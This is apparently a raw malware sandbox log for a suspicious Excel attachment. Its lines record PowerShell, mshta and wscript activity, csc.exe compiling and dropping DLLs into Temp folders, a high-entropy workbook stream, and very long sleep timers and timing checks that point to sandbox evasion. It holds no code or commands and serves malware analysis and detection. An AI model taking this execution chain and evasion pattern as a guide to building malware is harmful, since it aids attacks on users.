Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: A & C Metrology OC 5457144.xls Stream path 'Workbook' entropy: 7.99864523402 (max. 8.0)
Source: 54330000.0.dr Stream path 'Workbook' entropy: 7.99847056553 (max. 8.0)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88F2314B rdtsc 5_2_000007FE88F2314B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5370 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1668 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2925 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5075 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 774 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1409 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 942 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8893 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2246
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8958
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 833
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll Jump to dropped file
Source: C:\Windows\System32\mshta.exe TID: 3708 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 2925 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 5075 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3932 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep count: 774 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep count: 1409 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep count: 942 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep count: 8893 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 808 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560 Thread sleep time: -10145709240540247s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 1964 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep count: 2474 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep count: 2246 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 Thread sleep count: 2206 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2576 Thread sleep count: 1340 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3456 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564 Thread sleep count: 399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3564 Thread sleep count: 1552 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep count: 8958 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944 Thread sleep count: 833 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4048 Thread sleep time: -2400000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
